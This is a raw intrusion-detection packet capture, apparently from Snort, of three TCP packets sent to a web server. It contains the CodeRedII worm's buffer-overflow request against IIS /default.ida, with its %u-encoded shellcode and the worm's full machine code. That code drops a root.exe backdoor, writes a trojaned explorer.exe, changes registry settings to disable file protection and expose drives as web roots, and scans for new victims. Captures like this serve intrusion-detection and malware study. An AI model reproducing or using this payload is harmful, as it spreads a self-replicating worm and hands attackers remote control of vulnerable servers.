04/03-18:18:13.858754 64.252.193.160:2952 -> 192.168.1.101:80
TCP TTL:126 TOS:0x0 ID:7705 IpLen:20 DgmLen:1454 DF
***A**** Seq: 0xD26AD475 Ack: 0x93A16DBB Win: 0x4248 TcpLen: 20
47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 GET /default.ida
3F 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 ?XXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 XXXXXXXXXXXXXXXX
58 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 X%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 u6858%ucbd3%u780
31 25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 1%u9090%u6858%uc
62 64 33 25 75 37 38 30 31 25 75 39 30 39 30 25 bd3%u7801%u9090%
75 39 30 39 30 25 75 38 31 39 30 25 75 30 30 63 u9090%u8190%u00c
33 25 75 30 30 30 33 25 75 38 62 30 30 25 75 35 3%u0003%u8b00%u5
33 31 62 25 75 35 33 66 66 25 75 30 30 37 38 25 31b%u53ff%u0078%
75 30 30 30 30 25 75 30 30 3D 61 20 20 48 54 54 u0000%u00=a HTT
50 2F 31 2E 30 0D 0A 43 6F 6E 74 65 6E 74 2D 74 P/1.0..Content-t
79 70 65 3A 20 74 65 78 74 2F 78 6D 6C 0A 43 6F ype: text/xml.Co
6E 74 65 6E 74 2D 6C 65 6E 67 74 68 3A 20 33 33 ntent-length: 33
37 39 20 0D 0A 0D 0A C8 C8 01 00 60 E8 03 00 00 79 ........`....
00 CC EB FE 64 67 FF 36 00 00 64 67 89 26 00 00 ....dg.6..dg.&..
E8 DF 02 00 00 68 04 01 00 00 8D 85 5C FE FF FF .....h......\... 
50 FF 55 9C 8D 85 5C FE FF FF 50 FF 55 98 8B 40 P.U...\...P.U..@
10 8B 08 89 8D 58 FE FF FF FF 55 E4 3D 04 04 00 .....X....U.=...
00 0F 94 C1 3D 04 08 00 00 0F 94 C5 0A CD 0F B6 ....=...........
C9 89 8D 54 FE FF FF 8B 75 08 81 7E 30 9A 02 00 ...T....u..~0...
00 0F 84 C4 00 00 00 C7 46 30 9A 02 00 00 E8 0A ........F0......
00 00 00 43 6F 64 65 52 65 64 49 49 00 8B 1C 24 ...CodeRedII...$
FF 55 D8 66 0B C0 0F 95 85 38 FE FF FF C7 85 50 .U.f.....8.....P
FE FF FF 01 00 00 00 6A 00 8D 85 50 FE FF FF 50 .......j...P...P
8D 85 38 FE FF FF 50 8B 45 08 FF 70 08 FF 90 84 ..8...P.E..p....
00 00 00 80 BD 38 FE FF FF 01 74 68 53 FF 55 D4 .....8....thS.U.
FF 55 EC 01 45 84 69 BD 54 FE FF FF 2C 01 00 00 .U..E.i.T...,...
81 C7 2C 01 00 00 E8 D2 04 00 00 F7 D0 0F AF C7 ..,.............
89 46 34 8D 45 88 50 6A 00 FF 75 08 E8 05 00 00 .F4.E.Pj..u.....
00 E9 01 FF FF FF 6A 00 6A 00 FF 55 F0 50 FF 55 ......j.j..U.P.U
D0 4F 75 D2 E8 3B 05 00 00 69 BD 54 FE FF FF 00 .Ou..;...i.T....
5C 26 05 81 C7 00 5C 26 05 57 FF 55 E8 6A 00 6A \&....\&.W.U.j.j
16 FF 55 8C 6A FF FF 55 E8 EB F9 8B 46 34 29 45 ..U.j..U....F4)E
84 6A 64 FF 55 E8 8D 85 3C FE FF FF 50 FF 55 C0 .jd.U...<...P.U.
0F B7 85 3C FE FF FF 3D 88 88 00 00 73 CF 0F B7 ...<...=....s...
85 3E FE FF FF 83 F8 0A 73 C3 66 C7 85 70 FF FF .>......s.f..p..
FF 02 00 66 C7 85 72 FF FF FF 00 50 E8 64 04 00 ...f..r....P.d..
00 89 9D 74 FF FF FF 6A 00 6A 01 6A 02 FF 55 B8 ...t...j.j.j..U.
83 F8 FF 74 F2 89 45 80 6A 01 54 68 7E 66 04 80 ...t..E.j.Th~f..
FF 75 80 FF 55 A4 59 6A 10 8D 85 70 FF FF FF 50 .u..U.Yj...p...P
FF 75 80 FF 55 B0 BB 01 00 00 00 0B C0 74 4B 33 .u..U........tK3
DB FF 55 94 3D 33 27 00 00 75 3F C7 85 68 FF FF ..U.=3'..u?..h..
FF 0A 00 00 00 C7 85 6C FF FF FF 00 00 00 00 C7 .......l........
85 60 FF FF FF 01 00 00 00 8B 45 80 89 85 64 FF .`........E...d.
FF FF 8D 85 68 FF FF FF 50 6A 00 8D 85 60 FF FF ....h...Pj...`..
FF 50 6A 00 6A 01 FF 55 A0 93 6A 00 54 68 7E 66 .Pj.j..U..j.Th~f
04 80 FF 75 80 FF 55 A4 59 83 FB 01 75 31 E8 00 ...u..U.Y...u1..
00 00 00 58 2D D3 03 00 00 6A 00 68 EA 0E 00 00 ...X-....j.h....
50 FF 75 80 FF 55 AC 3D EA 0E 00 00 75 11 6A 00 P.u..U.=....u.j.
6A 01 8D 85 5C FE FF FF 50 FF 75 80 FF 55 A8 FF j...\...P.u..U..
75 80 FF 55 B4 E9 E7 FE FF FF BB 00 00 DF 77 81 u..U..........w.
C3 00 00 01 00 81 FB 00 00 00 78 75 05 BB 00 00 ..........xu....
F0 BF 60 E8 0E 00 00 00 8B 64 24 08 64 67 8F 06 ..`......d$.dg..
00 00 58 61 EB D9 64 67 FF 36 00 00 64 67 89 26 ..Xa..dg.6..dg.&
00 00 66 81 3B 4D 5A 75 E3 8B 4B 3C 81 3C 0B 50 ..f.;MZu..K<.<.P
45 00 00 75 D7 8B 54 0B 78 03 D3 8B 42 0C 81 3C E..u..T.x...B..<
03 4B 45 52 4E 75 C5 81 7C 03 04 45 4C 33 32 75 .KERNu..|..EL32u
BB 33 C9 49 8B 72 20 03 F3 FC 41 AD 81 3C 03 47 .3.I.r ...A..<.G
65 74 50 75 F5 81 7C 03 04 72 6F 63 41 75 EB 03 etPu..|..rocAu..
4A 10 49 D1 E1 03 4A 24 0F B7 0C 0B C1 E1 02 03 J.I...J$........
4A 1C 8B 04 0B 03 C3 89 44 24 24 64 67 8F 06 00 J.......D$$dg...
00 58 61 C3 E8 51 FF FF FF 89 5D FC 89 45 F8 E8 .Xa..Q....]..E..
0D 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 ....LoadLibraryA
00 FF 75 FC FF 55 F8 89 45 F4 E8 0D 00 00 00 43 ..u..U..E......C
72 65 61 74 65 54 68 72 65 61 64 00 FF 75 FC FF reateThread..u..
55 F8 89 45 F0 E8 0D 00 00 00 47 65 74 54 69 63 U..E......GetTic
6B 43 6F 75 6E 74 00 FF 75 FC FF 55 F8 89 45 EC kCount..u..U..E.
E8 06 00 00 00 53 6C 65 65 70 00 FF 75 FC FF 55 .....Sleep..u..U
F8 89 45 E8 E8 17 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst
65 6D 44 65 66 61 75 6C 74 4C 61 6E 67 49 44 00 emDefaultLangID.
FF 75 FC FF 55 F8 89 45 E4 E8 14 00 00 00 47 65 .u..U..E......Ge
74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 tSystemDirectory
41 00 FF 75 FC FF 55 F8 89 45 E0 E8 0A 00 00 00 A..u..U..E......
43 6F 70 79 46 69 6C 65 41 00 FF 75 FC FF 55 F8 CopyFileA..u..U.
89 45 DC E8 10 00 .E....

04/03-18:18:13.943550 64.252.193.160:2952 -> 192.168.1.101:80
TCP TTL:126 TOS:0x0 ID:7706 IpLen:20 DgmLen:1454 DF
***A**** Seq: 0xD26AD9FB Ack: 0x93A16DBB Win: 0x4248 TcpLen: 20
00 00 47 6C 6F 62 61 6C 46 69 6E 64 41 74 6F 6D ..GlobalFindAtom
41 00 FF 75 FC FF 55 F8 89 45 D8 E8 0F 00 00 00 A..u..U..E......
47 6C 6F 62 61 6C 41 64 64 41 74 6F 6D 41 00 FF GlobalAddAtomA..
75 FC FF 55 F8 89 45 D4 E8 0C 00 00 00 43 6C 6F u..U..E......Clo
73 65 48 61 6E 64 6C 65 00 FF 75 FC FF 55 F8 89 seHandle..u..U..
45 D0 E8 08 00 00 00 5F 6C 63 72 65 61 74 00 FF E......_lcreat..
75 FC FF 55 F8 89 45 CC E8 08 00 00 00 5F 6C 77 u..U..E......_lw
72 69 74 65 00 FF 75 FC FF 55 F8 89 45 C8 E8 08 rite..u..U..E...
00 00 00 5F 6C 63 6C 6F 73 65 00 FF 75 FC FF 55 ..._lclose..u..U
F8 89 45 C4 E8 0E 00 00 00 47 65 74 53 79 73 74 ..E......GetSyst
65 6D 54 69 6D 65 00 FF 75 FC FF 55 F8 89 45 C0 emTime..u..U..E.
E8 0B 00 00 00 57 53 32 5F 33 32 2E 44 4C 4C 00 .....WS2_32.DLL.
FF 55 F4 89 45 BC E8 07 00 00 00 73 6F 63 6B 65 .U..E......socke
74 00 FF 75 BC FF 55 F8 89 45 B8 E8 0C 00 00 00 t..u..U..E......
63 6C 6F 73 65 73 6F 63 6B 65 74 00 FF 75 BC FF closesocket..u..
55 F8 89 45 B4 E8 0C 00 00 00 69 6F 63 74 6C 73 U..E......ioctls
6F 63 6B 65 74 00 FF 75 BC FF 55 F8 89 45 A4 E8 ocket..u..U..E..
08 00 00 00 63 6F 6E 6E 65 63 74 00 FF 75 BC FF ....connect..u..
55 F8 89 45 B0 E8 07 00 00 00 73 65 6C 65 63 74 U..E......select
00 FF 75 BC FF 55 F8 89 45 A0 E8 05 00 00 00 73 ..u..U..E......s
65 6E 64 00 FF 75 BC FF 55 F8 89 45 AC E8 05 00 end..u..U..E....
00 00 72 65 63 76 00 FF 75 BC FF 55 F8 89 45 A8 ..recv..u..U..E.
E8 0C 00 00 00 67 65 74 68 6F 73 74 6E 61 6D 65 .....gethostname
00 FF 75 BC FF 55 F8 89 45 9C E8 0E 00 00 00 67 ..u..U..E......g
65 74 68 6F 73 74 62 79 6E 61 6D 65 00 FF 75 BC ethostbyname..u.
FF 55 F8 89 45 98 E8 10 00 00 00 57 53 41 47 65 .U..E......WSAGe
74 4C 61 73 74 45 72 72 6F 72 00 FF 75 BC FF 55 tLastError..u..U
F8 89 45 94 E8 0B 00 00 00 55 53 45 52 33 32 2E ..E......USER32.
44 4C 4C 00 FF 55 F4 89 45 90 E8 0E 00 00 00 45 DLL..U..E......E
78 69 74 57 69 6E 64 6F 77 73 45 78 00 FF 75 90 xitWindowsEx..u.
FF 55 F8 89 45 8C C3 8B 45 84 69 C0 05 84 08 08 .U..E...E.i.....
40 89 45 84 8D 84 04 78 56 34 12 F7 D8 C1 C0 08 @.E....xV4......
C3 E8 E1 FF FF FF 3C 00 74 F7 3C FF 74 F3 C3 E8 ......<.t.<.t...
ED FF FF FF 8A F8 E8 E6 FF FF FF 8A D8 C1 E3 10 ................
E8 DC FF FF FF 8A F8 E8 D5 FF FF FF 8A D8 E8 B4 ................
FF FF FF 83 E0 07 E8 20 00 00 00 FF FF FF FF 00 ....... ........
FF FF FF 00 FF FF FF 00 FF FF FF 00 FF FF FF 00 ................
00 FF FF 00 00 FF FF 00 00 FF FF 59 8B 04 81 23 ...........Y...#
D8 F7 D0 23 85 58 FE FF FF 0B D8 80 FB 7F 74 9F ...#.X........t.
80 FB E0 74 9A 3B 9D 58 FE FF FF 74 92 C3 68 04 ...t.;.X...t..h.
01 00 00 8D 85 5C FE FF FF 50 FF 55 E0 8D BC 05 .....\...P.U....
5C FE FF FF E8 09 00 00 00 5C 43 4D 44 2E 45 58 \........\CMD.EX
45 00 5E FC A5 A5 A4 B3 63 6A 01 E8 1C 00 00 00 E.^.....cj......
64 3A 5C 69 6E 65 74 70 75 62 5C 73 63 72 69 70 d:\inetpub\scrip
74 73 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 88 ts\root.exe...$.
19 8D 85 5C FE FF FF 50 FF 55 DC 6A 01 E8 2B 00 ...\...P.U.j..+.
00 00 64 3A 5C 70 72 6F 67 72 61 7E 31 5C 63 6F ..d:\progra~1\co
6D 6D 6F 6E 7E 31 5C 73 79 73 74 65 6D 5C 4D 53 mmon~1\system\MS
41 44 43 5C 72 6F 6F 74 2E 65 78 65 00 8B 0C 24 ADC\root.exe...$
88 19 8D 85 5C FE FF FF 50 FF 55 DC E8 BA 05 00 ....\...P.U.....
00 FC 4D 5A 50 00 02 00 00 00 04 00 0F 00 FF FF ..MZP...........
00 00 B8 00 00 00 00 00 00 00 40 00 1A FC 00 00 ..........@.....
01 FC FC FC FC FC FC 00 00 50 45 00 00 4C 01 03 .........PE..L..
00 FD 2A 25 29 00 00 00 00 00 00 00 00 E0 00 8F ..*%)...........
81 0B 01 02 19 00 04 00 00 00 08 00 00 00 00 00 ................
00 00 10 00 00 00 10 00 00 00 20 00 00 00 00 40 .......... ....@
00 00 10 00 00 00 04 00 00 01 00 00 00 00 00 00 ................
00 03 00 0A 00 00 00 00 00 00 40 00 00 00 04 00 ..........@.....
00 00 00 00 00 02 00 00 00 00 00 10 00 00 20 00 .............. .
00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 ................
00 00 00 00 00 00 00 00 00 00 30 00 00 0C 01 FC ..........0.....
FC FC 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 ................
00 10 00 00 00 04 00 00 00 08 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 20 00 00 60 00 00 00 00 ........ ..`....
00 00 00 00 00 10 00 00 00 20 00 00 00 04 00 00 ......... ......
00 0C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
40 00 00 C0 00 00 00 00 00 00 00 00 00 10 00 00 @...............
00 30 00 00 00 04 00 00 00 10 00 00 00 00 00 00 .0..............
00 00 00 00 00 00 00 00 40 00 00 C0 FC FC FC FC ........@.......
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 68 04 01 00 00 68 D0 20 ........h....h. 
40 00 E8 61 01 00 00 8D B8 D0 20 40 00 BE 00 20 @..a...... @... 
40 00 A5 A5 A5 A5 6A 01 68 D0 20 40 00 E8 4C 01 @.....j.h. @..L.
00 00 E8 0C 00 00 00 68 C0 27 09 00 E8 31 01 00 .......h.'...1..
00 EB EF 68 D8 24 40 00 68 3F 00 0F 00 6A 00 68 ...h.$@.h?...j.h
10 20 40 00 68 02 00 00 80 E8 32 01 00 00 0B C0 . @.h.....2.....
75 26 6A 04 68 54 20 40 00 6A 04 6A 00 68 48 20 u&j.hT @.j.j.hH 
40 00 FF 35 D8 24 40 00 E8 0D 01 00 00 FF 35 D8 @..5.$@.......5.
24 40 00 E8 0E 01 00 00 68 D8 24 40 00 68 3F 00 $@......h.$@.h?.
0F 00 6A 00 68 58 20 40 00 68 02 00 00 80 E8 ED ..j.hX @.h......
00 00 00 0B C0 75 55 BD 9C 20 40 00 E8 4C 00 00 .....uU.. @..L..
00 BD A8 20 40 00 E8 42 00 00 00 6A 09 68 B8 20 ... @..B...j.h. 
40 00 6A 01 6A 00 68 B0 20 40 00 FF 35 D8 24 40 @.j.j.h. @..5.$@
00 E8 B4 00 00 00 6A 09 68 C4 20 40 00 6A 01 6A ......j.h. @.j.j
00 68 B4 20 40 00 FF 35 D8 24 40 00 E8 99 00 00 .h. @..5.$@.....
00 FF 35 D8 24 40 ..5.$@

04/03-18:18:14.038627 64.252.193.160:2952 -> 192.168.1.101:80
TCP TTL:126 TOS:0x0 ID:7714 IpLen:20 DgmLen:1030 DF
***AP*** Seq: 0xD26ADF81 Ack: 0x93A16DBB Win: 0x4248 TcpLen: 20
00 E8 9A 00 00 00 C3 C7 05 D0 24 40 00 00 04 00 ..........$@....
00 68 D0 24 40 00 68 D0 20 40 00 68 D4 24 40 00 .h.$@.h. @.h.$@.
6A 00 55 FF 35 D8 24 40 00 E8 60 00 00 00 0B C0 j.U.5.$@..`.....
75 49 A1 D0 24 40 00 0B C0 74 40 BE D0 20 40 00 uI..$@...t@.. @.
80 3E 00 74 36 46 66 81 7E FE 2C 2C 75 F2 C7 06 .>.t6Ff.~.,,u...
32 31 37 00 81 EE CC 20 40 00 89 35 D0 24 40 00 217.... @..5.$@.
FF 35 D0 24 40 00 68 D0 20 40 00 6A 01 6A 00 55 .5.$@.h. @.j.j.U
FF 35 D8 24 40 00 E8 19 00 00 00 C3 FF 25 60 30 .5.$@........%`0
40 00 FF 25 64 30 40 00 FF 25 68 30 40 00 FF 25 @..%d0@..%h0@..%
70 30 40 00 FF 25 74 30 40 00 FF 25 78 30 40 00 p0@..%t0@..%x0@.
FF 25 7C 30 40 FC FC FC FC FC FC FC FC FC FC FC .%|0@...........
FC FC FC FC FC FC FC FC 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 5C 45 58 50 4C 4F 52 45 52 2E 45 .....\EXPLORER.E
58 45 00 00 00 53 4F 46 54 57 41 52 45 5C 4D 69 XE...SOFTWARE\Mi
63 72 6F 73 6F 66 74 5C 57 69 6E 64 6F 77 73 20 crosoft\Windows 
4E 54 5C 43 75 72 72 65 6E 74 56 65 72 73 69 6F NT\CurrentVersio
6E 5C 57 69 6E 6C 6F 67 6F 6E 00 00 00 53 46 43 n\Winlogon...SFC
44 69 73 61 62 6C 65 00 00 9D FF FF FF 53 59 53 Disable......SYS
54 45 4D 5C 43 75 72 72 65 6E 74 43 6F 6E 74 72 TEM\CurrentContr
6F 6C 53 65 74 5C 53 65 72 76 69 63 65 73 5C 57 olSet\Services\W
33 53 56 43 5C 50 61 72 61 6D 65 74 65 72 73 5C 3SVC\Parameters\
56 69 72 74 75 61 6C 20 52 6F 6F 74 73 00 00 00 Virtual Roots...
00 2F 53 63 72 69 70 74 73 00 00 00 00 2F 4D 53 ./Scripts..../MS
41 44 43 00 00 2F 43 00 00 2F 44 00 00 63 3A 5C ADC../C../D..c:\
2C 2C 32 31 37 00 00 00 00 64 3A 5C 2C 2C 32 31 ,,217....d:\,,21
37 FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC 7...............
FC FC FC FC FC FC FC FC FC FC 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 3C 30 ..............<0
00 00 00 00 00 00 00 00 00 00 84 30 00 00 60 30 ...........0..`0
00 00 4C 30 00 00 00 00 00 00 00 00 00 00 91 30 ..L0...........0
00 00 70 30 00 00 00 00 00 00 00 00 00 00 00 00 ..p0............
00 00 00 00 00 00 00 00 00 00 9E 30 00 00 A6 30 ...........0...0
00 00 BE 30 00 00 00 00 00 00 C8 30 00 00 DC 30 ...0.......0...0
00 00 EE 30 00 00 FE 30 00 00 00 00 00 00 9E 30 ...0...0.......0
00 00 A6 30 00 00 BE 30 00 00 00 00 00 00 C8 30 ...0...0.......0
00 00 DC 30 00 00 EE 30 00 00 FE 30 00 00 00 00 ...0...0...0....
00 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 41 ..KERNEL32.dll.A
44 56 41 50 49 33 32 2E 64 6C 6C 00 00 00 53 6C DVAPI32.dll...Sl
65 65 70 00 00 00 47 65 74 57 69 6E 64 6F 77 73 eep...GetWindows
44 69 72 65 63 74 6F 72 79 41 00 00 00 00 57 69 DirectoryA....Wi
6E 45 78 65 63 00 00 00 52 65 67 51 75 65 72 79 nExec...RegQuery
56 61 6C 75 65 45 78 41 00 00 00 00 52 65 67 53 ValueExA....RegS
65 74 56 61 6C 75 65 45 78 41 00 00 00 00 52 65 etValueExA....Re
67 4F 70 65 6E 4B 65 79 45 78 41 00 00 00 52 65 gOpenKeyExA...Re
67 43 6C 6F 73 65 4B 65 79 FC FC FC FC FC FC FC gCloseKey.......
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC FC ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 5E BF B9 05 00 00 6A 07 E8 10 00 .....^.....j....
00 00 64 3A 5C 65 78 70 6C 6F 72 65 72 2E 65 78 ..d:\explorer.ex
65 00 8B 04 24 88 18 FF 55 CC 83 F8 FF 74 4D 89 e...$...U....tM.
85 4C FE FF FF AC 8A F8 38 3E 75 27 6A 20 E8 23 .L......8>u'j .#
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 6A 01 56 FF B5 4C FE FF FF FF 55 C8 46 ...j.V..L....U.F
4F 75 C5 FF B5 4C FE FF FF FF 55 C4 FE C3 80 FB Ou...L....U.....
64 0F 86 4C F9 FF FF C3 61 C9 C2 04 00 90 d..L....a.....